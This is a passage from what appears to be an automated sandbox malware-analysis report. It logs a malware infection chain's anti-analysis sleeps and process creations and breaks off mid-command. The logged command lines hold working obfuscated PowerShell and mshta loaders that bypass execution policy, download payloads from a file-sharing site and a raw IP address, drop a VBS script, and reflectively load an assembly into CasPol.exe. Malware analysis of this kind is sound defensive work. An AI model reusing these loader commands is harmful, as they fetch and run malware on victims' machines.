      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3912Thread sleep count: 4872 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952Thread sleep time: -120000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3956Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3896Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep count: 1792 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep count: 375 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2440Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 928Thread sleep count: 2415 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 928Thread sleep count: 5671 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2736Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064Thread sleep time: -8301034833169293s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064Thread sleep time: -3600000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXeJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES59C4.tmp" "c:\Users\user\AppData\Local\Temp\cfogy1ty\CSCDB27D48C833B4E44BF14917DCA05AE4.TMP"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQU2hvbUVbNF0rJHBTaG9NZVszMF0rJ1gnKSgoJ2UzJysnSWltYWcnKydlVXJsID0gSGV1aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfJysnMHhDeS14bDR0bnhsQVZiUTk1LWR2aVRLJysnNWNBUmFOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSGV1O2UzSXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ZTNJaW1hJysnZ2VCeXRlJysncyA9IGUzSXdlYkNsaWVudC5Eb3dubG9hZERhdGEoZTNJaW1hZ2VVcmwpO2UzSWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZycrJ106OlVURjguR2V0U3RyaW5nKGUzSWltYWdlQnl0ZXMnKycpO2UzSXN0YScrJ3J0RmxhZycrJyA9IEhldTw8QkFTRTY0X1NUQVJUPj5IZXU7ZTNJZW5kRmxhZyA9JysnIEgnKydldTw8QkFTRTY0X0VORD4+SGV1O2UzSXN0YXJ0SW5kZXggPSBlM0lpbWFnZVRleHQuSW5kZXhPZihlM0lzdGFydEZsYWcpO2UzSWVuZEluZGV4ID0gZTNJaW1hZ2VUZXh0LkluZGV4T2YoZTNJZW5kRmxhZyk7ZTNJc3RhcnRJbicrJ2RleCAtZ2UgMCAtYW5kIGUzSWVuZEluZGV4IC0nKydndCBlM0lzdGFydEluZGV4O2UzSScrJ3N0YXJ0SW5kZXggKz0gZTNJc3RhcnQnKydGbGFnLkxlJysnbmd0aDtlM0liYXNlNjRMZW5ndGggPSBlM0llbmRJbmRleCAtIGUzSXN0YXJ0SW5kZXg7ZTMnKydJYmFzZTY0Q29tbWFuZCA9IGUzSWltYWdlVGV4dCcrJy5TdWJzdHJpbmcoZTNJc3RhcnRJbmRleCwgZTNJYmFzZTY0TGVuZ3RoKTtlM0liYXNlNjRSZScrJ3YnKydlJysncnNlZCA9IC1qb2luIChlM0liYXNlNjRDb21tYW5kLlRvQ2gnKydhckFycmF5KCkga1VpIEZvckVhY2gtT2JqZWN0IHsgZTNJXyB9KVstMS4uLShlM0liYXNlNjRDb21tYW5kLkxlbmd0aCldO2UzSScrJ2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoZScrJzNJYmEnKydzZTY0UmV2ZXJzZWQpO2UzJysnSWxvYWRlJysnZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SJysnZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChlMycrJ0ljb21tYW5kQnl0ZXMpO2UzSXZhaU1ldGhvZCAnKyc9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoSGV1VkFJSGV1KTtlM0l2YWlNZXRob2QuSW52b2tlKGUzSW51bGwsIEAoSGV1dHh0JysnLk1STUFDLzEyMzEvNTcxLjQ0LjI3MS43MDEvLzpwdHRoSGV1LCBIZXVkZXNhdGl2YWRvSGV1LCBIZXVkZXNhdCcrJ2l2YWRvSGV1LCAnKydIZXVkZXNhdGl2YWRvSGV1LCBIZXVDYXNQb2xIZXUsIEhldWRlc2F0aXZhZG9IZXUsIEhldWRlc2F0aXZhZG9IZXUsSGUnKyd1ZGVzYXRpdmFkbycrJ0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldWRlc2F0aXZhZG9IZXUsSGV1ZGVzYXRpdmFkb0hldSxIZXVkZXNhdGl2YWRvSGV1LEhldTFIZXUsSGV1ZCcrJ2VzYXRpdmFkb0gnKydldSkpOycpLnJFUGxhQ0UoKFtjSEFSXTcyK1tjSEFSXTEwMStbY0hBUl0xMTcpLFtTVFJJTkddW2NIQVJdMzkpLnJFUGxhQ0UoKFtjSEFSXTEwNytbY0hBUl04NStbY0hBUl0xMDUpLFtTVFJJTkddW2NIQVJdMTI0KS5yRVBsYUNFKCdlM0knLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jepqemwgicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagqwrklvrzugugicagicagicagicagicagicagicagicagicagicagicatbuvtykvyzevmau5pvglptiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb24ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbyvkzqy0wsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagz09oz0j5lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagihhhlhvpbnqgicagicagicagicagicagicagicagicagicagicagicbtaejpleludfb0ciagicagicagicagicagicagicagicagicagicagicagigzqt0vmktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiaxf3usigicagicagicagicagicagicagicagicagicagicagicattkfnrxnqyunlicagicagicagicagicagicagicagicagicagicagicageuziu21revdjicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrkuhpsojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3mi40nc4xnzuvmtmyms9zzwv0agvizxn0dghpbmdzzw50axjldgltzxdoawnoz2l2zw5izxn0zgvzawduzm9yew91cnroaw5ncy50suyilcikru52okfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3agljagdpdmvuymvzdgrlc2lnbmzvcnlvdxj0ac52qnmildasmck7c1rbcnqtc2xlrxaomyk7sukgicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxhnlzxrozwjlc3r0agluz3nlbnrpcmv0aw1ld2hpy2hnaxzlbmjlc3rkzxnpz25mb3j5b3vydggudkjzig=='+[char]0x22+'))')))"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicrqu2hvbuvbnf0rjhbtag9nzvszmf0rj1gnksgoj2uzjysnswltywcnkydlvxjsid0gsgv1ahr0chm6ly8zmta1lmzpbgvtywlslmnvbs9hcgkvzmlszs9nzxq/zmlszwtlet1zafrqsgjdufg4by1st3rdcuhmrzzfjysnmhhdes14bdr0bnhsqvziutk1lwr2avrljysnnwnbumfozffqymizbwv4zndrekttvfhnjnnraxbyzwc9dhj1zszwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi1mzezmdlinwzmn2mgsgv1o2uzsxdlyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7ztnjaw1hjysnz2vcexrljysncya9iguzsxdlyknsawvudc5eb3dubg9hzerhdgeoztnjaw1hz2vvcmwpo2uzswltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluzycrj106olvurjgur2v0u3ryaw5nkguzswltywdlqnl0zxmnkycpo2uzsxn0yscrj3j0rmxhzycrjya9iehldtw8qkftrty0x1nuqvjupj5izxu7ztnjzw5krmxhzya9jysniegnkydldtw8qkftrty0x0vord4+sgv1o2uzsxn0yxj0sw5kzxggpsblm0lpbwfnzvrlehqusw5kzxhpzihlm0lzdgfydezsywcpo2uzswvuzeluzgv4id0gztnjaw1hz2vuzxh0lkluzgv4t2yoztnjzw5krmxhzyk7ztnjc3rhcnrjbicrj2rlecatz2ugmcatyw5kiguzswvuzeluzgv4ic0nkydndcblm0lzdgfydeluzgv4o2uzsscrj3n0yxj0sw5kzxggkz0gztnjc3rhcnqnkydgbgfnlkxljysnbmd0adtlm0liyxnlnjrmzw5ndgggpsblm0llbmrjbmrlecatiguzsxn0yxj0sw5kzxg7ztmnkydjymfzzty0q29tbwfuzca9iguzswltywdlvgv4dccrjy5tdwjzdhjpbmcoztnjc3rhcnrjbmrlecwgztnjymfzzty0tgvuz3rokttlm0liyxnlnjrszscrj3ynkydljysncnnlzca9ic1qb2luichlm0liyxnlnjrdb21tyw5kllrvq2gnkydhckfycmf5kckga1vpiezvckvhy2gtt2jqzwn0ihsgztnjxyb9kvstms4ulshlm0liyxnlnjrdb21tyw5klkxlbmd0acldo2uzsscrj2nvbscrj21hbmrcexrlcya9ifttexn0zw0ujysnq29udmvydf06okzyb21cyxnlnjrtdhjpbmcozscrjznjymenkydzzty0umv2zxjzzwqpo2uzjysnswxvywrljysnzefzc2vtymx5id0gw1n5c3rljysnbs5sjysnzwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchlmycrj0ljb21tyw5kqnl0zxmpo2uzsxzhau1ldghvzcankyc9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qosgv1vkfjsgv1kttlm0l2ywlnzxrob2qusw52b2tlkguzsw51bgwsieaosgv1dhh0jysnlk1stufdlzeymzevntcxljq0lji3ms43mdevlzpwdhrosgv1lcbizxvkzxnhdgl2ywrvsgv1lcbizxvkzxnhdccrj2l2ywrvsgv1lcankydizxvkzxnhdgl2ywrvsgv1lcbizxvdyxnqb2xizxusiehldwrlc2f0axzhzg9izxusiehldwrlc2f0axzhzg9izxussgunkyd1zgvzyxrpdmfkbycrj0hldsxizxvkzxnhdgl2ywrvsgv1lehldwrlc2f0axzhzg9izxussgv1zgvzyxrpdmfkb0hldsxizxvkzxnhdgl2ywrvsgv1lehldtfizxussgv1zccrj2vzyxrpdmfkb0gnkydldskpoycplnjfugxhq0uokftjsefsxtcyk1tjsefsxtewmstby0hbul0xmtcplfttvfjjtkddw2niqvjdmzkplnjfugxhq0uokftjsefsxtewnytby0hbul04nstby0hbul0xmduplfttvfjjtkddw2niqvjdmti0ks5yrvbsyunfkcdlm0knlcckjykgkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $pshome[4]+$pshome[30]+'x')(('e3'+'iimag'+'eurl = heuhttps://3105.filemail.com/api/file/get?filekey=shtphbcpx8o-lotcqhlg6_'+'0xcy-xl4tnxlavbq95-dvitk'+'5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c heu;e3iwebclient = new-object system.net.webclient;e3iima'+'gebyte'+'s = e3iwebclient.downloaddata(e3iimageurl);e3iimagetext = [system.text.encoding'+']::utf8.getstring(e3iimagebytes'+');e3ista'+'rtflag'+' = heu<<base64_start>>heu;e3iendflag ='+' h'+'eu<<base64_end>>heu;e3istartindex = e3iimagetext.indexof(e3istartflag);e3iendindex = e3iimagetext.indexof(e3iendflag);e3istartin'+'dex -ge 0 -and e3iendindex -'+'gt e3istartindex;e3i'+'startindex += e3istart'+'flag.le'+'ngth;e3ibase64length = e3iendindex - e3istartindex;e3'+'ibase64command = e3iimagetext'+'.substring(e3istartindex, e3ibase64length);e3ibase64re'+'v'+'e'+'rsed = -join (e3ibase64command.toch'+'ararray() kui foreach-object { e3i_ })[-1..-(e3ibase64command.length)];e3i'+'com'+'mandbytes = [system.'+'convert]::frombase64string(e'+'3iba'+'se64reversed);e3'+'iloade'+'dassembly = [syste'+'m.r'+'eflection.assembly]::load(e3'+'icommandbytes);e3ivaimethod '+'= [dnlib.io.home].getmethod(heuvaiheu);e3ivaimethod.invoke(e3inull, @(heutxt'+'.mrmac/1231/571.44.271.701//:ptthheu, heudesativadoheu, heudesat'+'ivadoheu, '+'heudesativadoheu, heucaspolheu, heudesativadoheu, heudesativadoheu,he'+'udesativado'+'heu,heudesativadoheu,heudesativadoheu,heudesativadoheu,heudesativadoheu,heu1heu,heud'+'esativadoh'+'eu));').replace(([char]72+[char]101+[char]117),[string][char]39).replace(([char]107+[char]85+[char]105),[string][char]124).replace('e3i','$') )"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; 